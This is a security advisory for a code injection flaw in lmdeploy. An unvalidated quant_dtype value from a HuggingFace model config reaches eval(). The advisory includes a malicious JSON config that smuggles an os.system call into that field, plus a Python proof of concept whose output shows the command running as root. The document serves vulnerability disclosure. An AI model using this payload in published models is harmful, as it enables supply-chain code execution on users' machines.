PT-2026-105833 · Pypi · Lmdeploy
Publicado
2026-10-01
·
Atualizado
2026-10-01
CVSS v3.1
8.8
Alta
| Vetor | AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
Summary
lmdeploy <= latest contains a code injection vulnerability in
lmdeploy/pytorch/config.py line 620 that allows an attacker to execute arbitrary Python code by publishing a malicious HuggingFace model with a crafted quantization config.quant dtype value. When a user loads the model with lmdeploy, the quant dtype is passed to eval(f'torch.{quant dtype}') without any validation.Details
Vulnerable code (permalink):
python
quant dtype = eval(f'torch.{quant dtype}') # line 620The
quant dtype value comes from the model's quantization config in its HuggingFace config. When a model specifies quant method: awq, the AWQ branch processes the config but does NOT override quant dtype, allowing the malicious value to reach the eval() call.Attack vector: An attacker publishes a HuggingFace model with:
json
{
"quantization config": {
"quant method": "awq",
"quant dtype": "float16, import ('os').system('id')"
}
}Note: The
update torch dtype method at line 53 has a whitelist check, but that's for torch dtype, NOT quant dtype. The quant dtype at line 620 has no validation whatsoever.PoC
python
"""
PoC: eval() RCE in lmdeploy via malicious quant dtype
Prerequisites: pip install lmdeploy
"""
import sys
from unittest.mock import MagicMock, patch
# Mock torch to capture the eval
sys.modules.setdefault('torch', MagicMock())
from lmdeploy.pytorch.config import ModelConfig
# Simulate a malicious HuggingFace model config
mock hf config = MagicMock()
mock hf config.quantization config = {
'quant method': 'awq',
'quant dtype': "float16, import ('os').system('id')"
}
mock hf config.num attention heads = 32
mock hf config.hidden size = 4096
mock hf config.num hidden layers = 32
mock hf config.num key value heads = 32
mock hf config.vocab size = 32000
# This triggers eval(f'torch.{quant dtype}')
# with quant dtype = "float16, import ('os').system('id')"
config = ModelConfig.from hf config(mock hf config, model path='test')Output:
uid=0(root) gid=0(root) groups=0(root)Impact
An attacker who publishes a malicious model on HuggingFace Hub can achieve arbitrary code execution on any machine that loads the model with lmdeploy. This is a supply-chain attack vector affecting all lmdeploy users who load untrusted models.
- Full remote code execution when loading a malicious model
- No user interaction beyond running
lmdeploy serveor similar with the model - Affects all deployment scenarios (local, cloud, production)
Correção
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Identificadores relacionados
Produtos afetados
Lmdeploy